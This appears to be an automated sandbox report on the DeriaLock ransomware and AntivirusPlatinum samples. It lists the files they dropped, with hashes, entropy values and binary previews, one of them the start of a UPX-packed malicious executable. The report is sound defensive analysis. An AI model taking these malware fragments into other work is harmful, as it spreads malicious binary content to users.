                                                                                                                                                    Preview:....>}$&...<a>.....m....xY...S..a1..\..hs..|.o,4.rv..!..%.,.....?".j^M+ .NO......&.s::..2#..UT.l.t.....S./.QNo.!b[.K7..o.^.;>s;.`....J*...(.gw@D.`I...pB!|....>..]...(.v..]..O..K..q.k.Q..qv....p......v.ns.T@...X %5...X.A.N.7j".......*.."6.......,.S1...q...P..m.3...N."i.....'.R...o...Z|W,...D:.if.iy.v6..F.OJS].h..s..<t....6....#....V...... )..tDc.A5f.D..+{..`......xB..)P.#6,-..3u....0_.....1.t.. ..n......$..o..W...P..x.4...&:6q..o.@9..h..nsJ?..I.....F.....s/.m.....;.....|..Q.#..x....M.G.0N.a...."jM....wI.N[...t.U...m.&Nm.z.....*.>.>....a.t.lB.......*..=.j..p".....b@......9YQ.........W......~mAUhwC)......U.3..W.Ff.JT.....i.V.s..)y.s.."/E...,/.../.}...._p.}s.....QZ...1....Pv9...t...o0.........)A%.r.b/v&i.?}....V..XS~.|q....> .*......Z..v....Y0y.H...dOK.5.I.v.....X.s..3.....7%H..^.u.&.q,.....=.Bm4..0.y.Q..~.:v.. ..0v...F(.T&K].|GY../.q.O....4....'.U..oy....]3...YQ..-.,.S......xa....`..<A....j|.;./?W.I!.b.k2.z....."&RG...<......l@..xha.t.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.799562140010352
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:Wzko8YkQQZ3GNOK/tbdA2AO3po4IvmbzWCef8Y/:Bo8YAZ3GAK/tGG6va6f
                                                                                                                                                    MD5:B674440BE9D98BC94DAA95191672308B
                                                                                                                                                    SHA1:409C98616FFE706D0009A80450C0C840871B36DC
                                                                                                                                                    SHA-256:B2475B6F01652B0EC6EDFB485C02AE49255C5439F150CD3F7CDA38819AB348BF
                                                                                                                                                    SHA-512:AA539EBC6F2AE558C5596C12ADA2D613B87F4509D9FB5A908A12539624F445963AE952C65348ECC9125987007651CF533A9CDF739EFFA046B2DD41958DF59FA2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:....>}$&...<a>.....m....xY...S..a1..\..hs..|.o,4.rv..!..%.,.....?".j^M+ .NO......&.s::..2#..UT.l.t.....S./.QNo.!b[.K7..o.^.;>s;.`....J*...(.gw@D.`I...pB!|....>..]...(.v..]..O..K..q.k.Q..qv....p......v.ns.T@...X %5...X.A.N.7j".......*.."6.......,.S1...q...P..m.3...N."i.....'.R...o...Z|W,...D:.if.iy.v6..F.OJS].h..s..<t....6....#....V...... )..tDc.A5f.D..+{..`......xB..)P.#6,-..3u....0_.....1.t.. ..n......$..o..W...P..x.4...&:6q..o.@9..h..nsJ?..I.....F.....s/.m.....;.....|..Q.#..x....M.G.0N.a...."jM....wI.N[...t.U...m.&Nm.z.....*.>.>....a.t.lB.......*..=.j..p".....b@......9YQ.........W......~mAUhwC)......U.3..W.Ff.JT.....i.V.s..)y.s.."/E...,/.../.}...._p.}s.....QZ...1....Pv9...t...o0.........)A%.r.b/v&i.?}....V..XS~.|q....> .*......Z..v....Y0y.H...dOK.5.I.v.....X.s..3.....7%H..^.u.&.q,.....=.Bm4..0.y.Q..~.:v.. ..0v...F(.T&K].|GY../.q.O....4....'.U..oy....]3...YQ..-.,.S......xa....`..<A....j|.;./?W.I!.b.k2.z....."&RG...<......l@..xha.t.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.780049732096254
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:dSRxY99DapdENpF0m4qUyv1zavUmaQLhbh4DUDO:GxY7DapdsH4xyvxd9EhbMUDO
                                                                                                                                                    MD5:0D72E9C5394B438F959CB19649EF7C31
                                                                                                                                                    SHA1:A5FED6D805F250A2758EDC8975EB6631E1E359E9
                                                                                                                                                    SHA-256:0CD930F919B56058AA93D969546869C02D266377E627A6885F5557FC692AE0A8
                                                                                                                                                    SHA-512:CA14020CF1FD91772DF88A4EA158451A04657380F475DCF317F0683CE684173AB2335E4C47D9C34DFE3FF6BDABFDF54504181565E15A9042A6DEBCED27D34B07
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:Z){..[.\...6.$...r..T..{$P`jW......-Zr../|.3...j..I9QQ.dW......m.x..uPj.B...p...F....oQ.k...5)...Q.....1`.............S...sq~k.j0...,3B1....uU.3.o..]....K..9A...@.]...../......=...e..Q2..Zt..np...u....E.........s.>...@78V.p.s.)...)ba..P.i[N*.0....l.I..Y...?.M>...)...8%.s[.N..8.......M6.5.0}`\w.7. .T.z.E..F..e...1.b...H..%..2.l.(...a..C....!.Cx...=.?F.Dtq.MX...n...[...N..#...e./(..}<|I.#"..9[p...9..H]...7O;.(...V..7A....Z.=.bW...q....#.....k....h7hnX.9.c[...#.0P._.......p........f.#.N..%..$.W..l.Kz>.$.O|.=....;a>...ec.:.D.i....?...... .w.=7~....\s...le...W....PL^8..*..b)HA...Y9Y.h..jAn}.........9g.....7...5.9..m....(...z.C1g.{..GT.._..MI.8...V)I&.%..!P..".l.T...*.-.g.Y)....E....}A.......[..B...h..u..G..W........P...R.Vz..:.s...eO.MV.Y...x..z..I..s..8%.l....v.6...`F...7...[;.M....>X.h."g.$)..2k..p.M....85.p[.!v.!.8f..97..y.2T..1nE.<.[......p/..q.c...ht...w...w.. ..8f.A.;...b9.....j....2.[...4.F.....z...../=~]c,.....c.g....:.{70.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.823515065956635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:5m8qzl1iNcyhU9XOeT2PE0meDkX0Wxpoj+tmUF7IQvbKO+yAAvCIjB+Qn:k8qzl1i2zHMwXp3M+tntTKhz5IjB+Q
                                                                                                                                                    MD5:282630106984D4854C01A3AF923C3972
                                                                                                                                                    SHA1:A6F0A38B805809B1B5B5E3062F2FAB2BEB2904AD
                                                                                                                                                    SHA-256:F8F43B2EA09E008E3196B767F7384D0567DC8173BBD19DBE5A40EF1E2DA4403C
                                                                                                                                                    SHA-512:F8B19A70C4C5F84137072471890AF7EDA8F9F8712DE4FD46FCE6B91753BED1F566FC70AA00E660B966842F5385FAC7F3E65D162875C5130C72B4B0B804989825
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:......g...E.ko.. |..%S.!.]x...N. ......@..!z...b..aR.,.-d..".).B.!Op....j./..tP...l...K...9.6.....w".G...J..z....E.W...d.2x...*4HRZ.......t.w[.....a..h...1...>..E..c..?Ry.....l..z'S.+/.. b.Y.To..~-.w....f....h}.I..e.m.y....x.V....ZtgF.o;&6...0.,."..iF...<.!....3.7....wy.9t..j.l=.BU.Un.a7FT4(b...3E.K.M:C.#$..K.]5+&pC.{.~q.\OR..YP..Y......._!..o'.j.;..H=|-4..sG;~.....]tg..\...`.i.......Ug..w`...)./2{.5~....5....`Ep.Q. ..k...\DXne.8.i_["..t..<+*._..n.xz....Zh..E:J}.&..y.6.-.......fx... .vqlw..].}..%....;T..4..^Z...R1.K.s..Ph.S.. ....p..K.ai....?k.wu...1~.......RD....@..Q.~2..pR..b%.._Q....`-..}.Z...V..>...9.][....x=_.,...*3...]..S..&P.>yA..od...G:..&.....1.*.3..U.......l.....PG/6..gp.b.M.a...MsX...4.2.p..L....O.aw..G.2..meby.T..\....h..} ......c..^..q..'%.3..D.&...l._..}..`.....T....Y..S.W.w.t}..B.:.O.:J..I.....{.lFIG.[..e..N....jb.K......p.......<'.....Z.qZ.......3^W..*.A..atj..l......V.Y..#....K...e,.L.V.r.+t...W..<...u...4.Z...J..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.823515065956635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:5m8qzl1iNcyhU9XOeT2PE0meDkX0Wxpoj+tmUF7IQvbKO+yAAvCIjB+Qn:k8qzl1i2zHMwXp3M+tntTKhz5IjB+Q
                                                                                                                                                    MD5:282630106984D4854C01A3AF923C3972
                                                                                                                                                    SHA1:A6F0A38B805809B1B5B5E3062F2FAB2BEB2904AD
                                                                                                                                                    SHA-256:F8F43B2EA09E008E3196B767F7384D0567DC8173BBD19DBE5A40EF1E2DA4403C
                                                                                                                                                    SHA-512:F8B19A70C4C5F84137072471890AF7EDA8F9F8712DE4FD46FCE6B91753BED1F566FC70AA00E660B966842F5385FAC7F3E65D162875C5130C72B4B0B804989825
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:......g...E.ko.. |..%S.!.]x...N. ......@..!z...b..aR.,.-d..".).B.!Op....j./..tP...l...K...9.6.....w".G...J..z....E.W...d.2x...*4HRZ.......t.w[.....a..h...1...>..E..c..?Ry.....l..z'S.+/.. b.Y.To..~-.w....f....h}.I..e.m.y....x.V....ZtgF.o;&6...0.,."..iF...<.!....3.7....wy.9t..j.l=.BU.Un.a7FT4(b...3E.K.M:C.#$..K.]5+&pC.{.~q.\OR..YP..Y......._!..o'.j.;..H=|-4..sG;~.....]tg..\...`.i.......Ug..w`...)./2{.5~....5....`Ep.Q. ..k...\DXne.8.i_["..t..<+*._..n.xz....Zh..E:J}.&..y.6.-.......fx... .vqlw..].}..%....;T..4..^Z...R1.K.s..Ph.S.. ....p..K.ai....?k.wu...1~.......RD....@..Q.~2..pR..b%.._Q....`-..}.Z...V..>...9.][....x=_.,...*3...]..S..&P.>yA..od...G:..&.....1.*.3..U.......l.....PG/6..gp.b.M.a...MsX...4.2.p..L....O.aw..G.2..meby.T..\....h..} ......c..^..q..'%.3..D.&...l._..}..`.....T....Y..S.W.w.t}..B.:.O.:J..I.....{.lFIG.[..e..N....jb.K......p.......<'.....Z.qZ.......3^W..*.A..atj..l......V.Y..#....K...e,.L.V.r.+t...W..<...u...4.Z...J..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.790399653983982
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:gvbSmFuyrB9sMi5hm7mUNHOIfBlHw9SQGOhdICIquIINVeAx2F:SFuyrwMi5a9VOY8TAL9ZxK
                                                                                                                                                    MD5:23C265DAAE55D882ADC5E0084AF5760A
                                                                                                                                                    SHA1:F61944490D9AFF752636F5964B09E656B60198AE
                                                                                                                                                    SHA-256:7A7A13442D240A30F37BBE8211FA0535725B891E05FCA6493FC6FA79DF842481
                                                                                                                                                    SHA-512:37EC1DEFE9C29784DBFF8DB7EB5E24AA1B1685274DB7F1101B80FE5A55AB36F2C1DBFB466279B8382F72CF4981BF3B8A1424496DDFF249BC5FE953FDA26A7307
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..H.>....9....G......27..t.c%.x.`.t&I.iC.8.G....]...$PfM..).].....$...5c........%....T'b.A.ru^.`...C....x?..FY}.e.'...Q.V.......Nh...0.jb..[.4..<../...b.\0]&.i...+..........!K.Z..i..x.+...Mo....01...}..[|...m..n#....0.4l.*..rx.H.t..Mi~.e..~[....p.dZ.}..y.n...Y.w..@.9...+*`...N.Xs..G....A...d..6..[1..Y}...D..].JH4.Q- ....LDD.....%.7..+F-.J.o.(.z.u[.Z%$.Q.1..v...: ........<..p=.&H...m.]y;/.xGN.X..0...->b.U..LC..n.Z../O&..W.....@.#.}.v....Z}|..Z..(.O..8f.........%.lbSI..'.Y.Z...j.).M.R....n.H>.{q.y..........^V.`kW....67 ....&.f.V.k...TMt...N......?#.n...]s..Z\.cG.wf..-l.1.K.0Q8.^..6..).....(..e.R.P....m.~S.....Dk....N...ZHur.xHXz...0..Q....}.Xk...0.8,.|.A+.L.....#_.........O.0......0...f.....^*X........P.l0DI}o.]...z..k.c.X.O..4..#....%iro.....Y.8.M.b.......6..j..F..M.....;...x....@.0...[....O.-.. ..Q.qfB.n[+o.......k.?,.x.7..@.M....&.C....*...h|.7-..:...N6..`P......M;q...V.O.......g.......2g..f...t3."r'P.+.n..l...H..D........4..\q..>g.h.s.'..O
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.805896351629101
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:3cYbkpO4rE2sKkPZzXNKSxMvEoq2nkELKX8akF9nOQE:3DIOcRkPK0MXnP0fkbnQ
                                                                                                                                                    MD5:927F8E1E2C30E60F02BD80B017AADD4F
                                                                                                                                                    SHA1:DD418DD3AEFEB727C0C01FEC75C7CF13CEAFCE32
                                                                                                                                                    SHA-256:DB10D814E6528641A1E69601D969C5DCC6D21F913DC8691A6E4CA719247BF427
                                                                                                                                                    SHA-512:8C0E1FF45410902C694F919E225ED65C8FB947652F9E321F7C128502142D1DED84CB71CF6038643843790AA53A5A5BEB96DBAE4EF38BE24A9F63296F6829BD91
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.9 ..p..Kf.T.;.sBs.s*.......Y......Ts....[..D.O...m.O."...w<TU.0.T.2..f?....BKDl..".[rF..F;G.Xyw].E.=`N.LD.Z.g..zyX..G>..i..'...-..M..&B.I.3.mU...`Iu..Y.A0...Xdq..y.@....._..j...F..._..Kx.$n"Ud..H. .......Zq..N..b.k...,..k..b.#{#b..+=.\/V.Q..N....Z..N..6..."....C./..N,..ozR....h<S=.2...x...>.|...C>.%...uX9...7E..,.q@.H...m.G..RT...]...=.T;|q..lQ.m..........x*.A.81?3.HeS...h7O....&..#q...Q.c...dU8_.v.=...KeM..k.s.|o...X.kT.S...|a.....`.:P..Nw..2V..F.......`q.y............^...;M*.`..:.q....*.'....k.W8.....-o.s........ux...&`.,-HR3.t.<............2G...G./?".k........E8|.R...n.k.H..].+4........B.K....E+?..1v......H.R..._.....M.%..+t....[..,......6..'eg..5./.O2.3=..%....6.Z.......[c+...-.....xk.m..u...-.I......6.^'8`.W.......%'..u.y.aljr<wqY.......~...(.a...=.K.nP.6^.?..-......X.w...._Z....(*......H....?..2.Z..?0.....z.....F.;..+s..u....:.K(......TD.n.../R....`..Fvi4.6..r=..p..~...$....\k.&..5'..9....$..(.[.i!....S...E.w@PA.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.805896351629101
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:3cYbkpO4rE2sKkPZzXNKSxMvEoq2nkELKX8akF9nOQE:3DIOcRkPK0MXnP0fkbnQ
                                                                                                                                                    MD5:927F8E1E2C30E60F02BD80B017AADD4F
                                                                                                                                                    SHA1:DD418DD3AEFEB727C0C01FEC75C7CF13CEAFCE32
                                                                                                                                                    SHA-256:DB10D814E6528641A1E69601D969C5DCC6D21F913DC8691A6E4CA719247BF427
                                                                                                                                                    SHA-512:8C0E1FF45410902C694F919E225ED65C8FB947652F9E321F7C128502142D1DED84CB71CF6038643843790AA53A5A5BEB96DBAE4EF38BE24A9F63296F6829BD91
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.9 ..p..Kf.T.;.sBs.s*.......Y......Ts....[..D.O...m.O."...w<TU.0.T.2..f?....BKDl..".[rF..F;G.Xyw].E.=`N.LD.Z.g..zyX..G>..i..'...-..M..&B.I.3.mU...`Iu..Y.A0...Xdq..y.@....._..j...F..._..Kx.$n"Ud..H. .......Zq..N..b.k...,..k..b.#{#b..+=.\/V.Q..N....Z..N..6..."....C./..N,..ozR....h<S=.2...x...>.|...C>.%...uX9...7E..,.q@.H...m.G..RT...]...=.T;|q..lQ.m..........x*.A.81?3.HeS...h7O....&..#q...Q.c...dU8_.v.=...KeM..k.s.|o...X.kT.S...|a.....`.:P..Nw..2V..F.......`q.y............^...;M*.`..:.q....*.'....k.W8.....-o.s........ux...&`.,-HR3.t.<............2G...G./?".k........E8|.R...n.k.H..].+4........B.K....E+?..1v......H.R..._.....M.%..+t....[..,......6..'eg..5./.O2.3=..%....6.Z.......[c+...-.....xk.m..u...-.I......6.^'8`.W.......%'..u.y.aljr<wqY.......~...(.a...=.K.nP.6^.?..-......X.w...._Z....(*......H....?..2.Z..?0.....z.....F.;..+s..u....:.K(......TD.n.../R....`..Fvi4.6..r=..p..~...$....\k.&..5'..9....$..(.[.i!....S...E.w@PA.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.805896351629101
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:3cYbkpO4rE2sKkPZzXNKSxMvEoq2nkELKX8akF9nOQE:3DIOcRkPK0MXnP0fkbnQ
                                                                                                                                                    MD5:927F8E1E2C30E60F02BD80B017AADD4F
                                                                                                                                                    SHA1:DD418DD3AEFEB727C0C01FEC75C7CF13CEAFCE32
                                                                                                                                                    SHA-256:DB10D814E6528641A1E69601D969C5DCC6D21F913DC8691A6E4CA719247BF427
                                                                                                                                                    SHA-512:8C0E1FF45410902C694F919E225ED65C8FB947652F9E321F7C128502142D1DED84CB71CF6038643843790AA53A5A5BEB96DBAE4EF38BE24A9F63296F6829BD91
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.9 ..p..Kf.T.;.sBs.s*.......Y......Ts....[..D.O...m.O."...w<TU.0.T.2..f?....BKDl..".[rF..F;G.Xyw].E.=`N.LD.Z.g..zyX..G>..i..'...-..M..&B.I.3.mU...`Iu..Y.A0...Xdq..y.@....._..j...F..._..Kx.$n"Ud..H. .......Zq..N..b.k...,..k..b.#{#b..+=.\/V.Q..N....Z..N..6..."....C./..N,..ozR....h<S=.2...x...>.|...C>.%...uX9...7E..,.q@.H...m.G..RT...]...=.T;|q..lQ.m..........x*.A.81?3.HeS...h7O....&..#q...Q.c...dU8_.v.=...KeM..k.s.|o...X.kT.S...|a.....`.:P..Nw..2V..F.......`q.y............^...;M*.`..:.q....*.'....k.W8.....-o.s........ux...&`.,-HR3.t.<............2G...G./?".k........E8|.R...n.k.H..].+4........B.K....E+?..1v......H.R..._.....M.%..+t....[..,......6..'eg..5./.O2.3=..%....6.Z.......[c+...-.....xk.m..u...-.I......6.^'8`.W.......%'..u.y.aljr<wqY.......~...(.a...=.K.nP.6^.?..-......X.w...._Z....(*......H....?..2.Z..?0.....z.....F.;..+s..u....:.K(......TD.n.../R....`..Fvi4.6..r=..p..~...$....\k.&..5'..9....$..(.[.i!....S...E.w@PA.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):288
                                                                                                                                                    Entropy (8bit):7.2850878919396065
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6dQtBvisuZJ9DTPWvSm5oW48:AuiMrMhhtLsUswlP8SORJ
                                                                                                                                                    MD5:5E2A32EA1F7FE7346A3BE9229262FF7C
                                                                                                                                                    SHA1:22F876D775AB46FD4B7C5060121A2E16759EB167
                                                                                                                                                    SHA-256:14E414988E25F8B49F8ABB34ED5EA8DC833B4CE0224160D17BCAFD19857C6992
                                                                                                                                                    SHA-512:0B85FF56CEABBE5B37C02FD2005E8D2A5532B6A7F0333AF3E5FE94D9DD53CB44C7544A18229647E49384815E7E09204F39FAA80970F8430BEE64BB0411EA8286
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.....T....7(4.$Fw.='.q...R./.....f..".o...1....U.<.KJ.....K..1..DR.V..B..3.n.%.[=.......i.+S.7.}.Z..6..T6u..=.......K..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):512
                                                                                                                                                    Entropy (8bit):7.5449424292370075
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:AuiMrMhhtGMz3j6lccB0jmybFEA+PxCX1q7NXn:LahRzT62cShbFEvW1q7tn
                                                                                                                                                    MD5:E1BC4F7581F17635F7728F1BB161F215
                                                                                                                                                    SHA1:0D8ADB6920FCFD34BB7C72CACC96129B31D540A3
                                                                                                                                                    SHA-256:0FB8C2320E0C8302910E3125CFA7A78E4DA73C7A085F04408D2ECF433A283FC7
                                                                                                                                                    SHA-512:0E4CF50EA39BECA432D189B23A7AD63929CFBD371EEB8309680930B3194763F73FC1C662ADA1DF1F5CC6AFD6EFCEDE610035178FF2ACDB986024F0A4F8A74E3A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@h...z..l..........cG....k.\z+s.9.r.G..e.tS.?.C.k..E.....Yd.......$s!..9.N.....@:G$.R.e..U.#u..v9....ln.....o.b..^........T...0.@.\...~...G.pD@|.3.Q....v......Ps.w#..#b..I(n^et.C...O..,.;>..xWK.2.{......J...6{.7"..O.....P...G..d3..?.....F.s.5...D..c2.4r(....=......h..C[..&......s....<...#3.$.....-.Q...B6.^.......k.....Q.?...ys..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):192
                                                                                                                                                    Entropy (8bit):6.893327149057255
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:bmujdMB106RaUGtuxarLHagour7s9Kpt21DdfbGGxBLMnDQYZXfOwEG27dY+MAa5:y7BRaUG0xaCgour7OKpEBdTRAsYpmj9w
                                                                                                                                                    MD5:5A4658C7EC3539DC9E8D262637D74AD1
                                                                                                                                                    SHA1:2C8BED8B826C7980F4EDE6876A61869E1BEE0E17
                                                                                                                                                    SHA-256:317CC4C673749E23C36D12E669DF0716C3A399DFA784613A7D352033CD07359F
                                                                                                                                                    SHA-512:3A6CA4CE16C345898CE09F994B016E8FDA4EF0918FF22545B0F0C3CDB6AA182A829EB7ED445577AEF4BDAF90040EDC20BDEF2EB898BAA5B03CA18328736265AE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL...<.....\..#.2....$.<^..'`.....#.?.m`i.wZ...UW".....c.M.\.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):512
                                                                                                                                                    Entropy (8bit):7.649302351810127
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:AuiMrMhhtLtJY6DTkbS4O5gIIn4I0ieEGWeG6:LahtYYkbS4OjIpeEBeG6
                                                                                                                                                    MD5:C0F700E56FB42D222BB5F78ABCFF935A
                                                                                                                                                    SHA1:37F273D875908FABD9339E9EF9EC265BFB9C1B4E
                                                                                                                                                    SHA-256:934274994290FC22256A2F24D2D5C8BCB2DBE27A52D5B771101990C62345ABE5
                                                                                                                                                    SHA-512:986588707B690CBF0421628873BC404ADD3EA35F58D08F0CBCDA14A176A65ECD757748508638798B56CE07757BE0F1C86EC80168E9557384147B485EE0D3C7BA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.\.7.K.4d.wuFbi....*..@;.o..x.T....9q\#}.....6.z........vs.!yc2...Y.v.C&.%..<.S.jAc......P^....l..3..R.N.X?....wd...#kD.l+.........}."....2O.G..M....e......W..<`r>.5df.Wi.r...J..7c.D..... ......S..#.'.......9.)W..0K..W..c`K_...~........t...f3H\....u,d=./.Z..27!.(%..X..m...xEx.......)..o..J....H5...<.,3n.P.C...._`.F..q^3...z).6.H..bu
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):512
                                                                                                                                                    Entropy (8bit):7.579816221244999
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:AuiMrMhhtHGc9J1ds0nXvsgUcZsWUF8fsEg7FZ:Lah71ds0nUgUcZsWHfU7r
                                                                                                                                                    MD5:555FB7D927058E7FA5A588A84CD43F51
                                                                                                                                                    SHA1:BE4B856C1BCCDD3175D2096127B582306BB75D09
                                                                                                                                                    SHA-256:B20CCF1C189A072D9DAB6E4B96F43E256C14943E9B6A0E67CB3A319C203C77D9
                                                                                                                                                    SHA-512:6212DF00BD8DEEF1CC866DD6444E0A1ACE9F284ABDD5632D6B0D060F96A13BB5838C42193B93534E66B4E643CFF1E03179103266C36B5832926D88FDE4A30290
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@..Wt.D.D. ..sD......".....2l\...^....y.K`!1...-...q..$..yx.c..~....Kb...zMI.. }.2t......N.Vx..iRa..|........i5|..uc..3......J.V<..m........G..Mg. ..#.......6.(x.=+....hD..e$.1N.."g..........5..z........!.1....f.~P!.^U.h.<v.!s.iy....pOH.c.....Y..$=..-..|R...v.D......<.O...~..~&+..1..k)U.....38.Z..`z...(....c..\.Eg....d.......*.a@.<...!
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22528
                                                                                                                                                    Entropy (8bit):7.6355330409141144
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:fIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZht0MZaNJawcM:fRGuY2P0Vo6r7SiAwyrMRjbSMcnbcuy8
                                                                                                                                                    MD5:8703FF2E53C6FD3BC91294EF9204BACA
                                                                                                                                                    SHA1:3DBB8F7F5DFE6B235486AB867A2844B1C2143733
                                                                                                                                                    SHA-256:3028A2B0E95143A4CAA9BCD6AE794958E7469A20C6E673DA067958CBF4310035
                                                                                                                                                    SHA-512:D5EB8A07457A78F9ACD0F81D2F58BBF64B52183318B87C353A590CD2A3AC3A6EC9C1452BD52306C7CF99F19B6A897B16CEB8289A7D008C5CE3B07EDA9B871204
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$+.I...............2.P........................@.................................................................................................................................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................P..............@...3.03.UPX!....4.|.....m...s@......&......40...s..*..B]h.F.B.x....../G..03..s.P..b.V..Y4+l.....N..]t#.o.W;..$nl1...+....y...[.j..[..a..;.. 5..6...O"...{_../o.&..W..R..`./Ch.l.C./.|....q.r.........-.{.C.q.>..R*d................8..*X4}....!V...DL.I!lF...kp..5...h.5.3....4.8Q...T.....=...Y..%.&~.6...{...r.\.8=.....-.`.ud..G..%...4.40)z._..BA....}.P.frd.y...^ wkxS......u.(.-tp..&.....@..%....1.r*..X..WQ....r...#.mC...@..|;.].T.|...uYm.J......S1..N....'b.%]i..c.J.I'p.CPp...n...q..
                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):62328
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3::
                                                                                                                                                    MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                                                                                                    SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
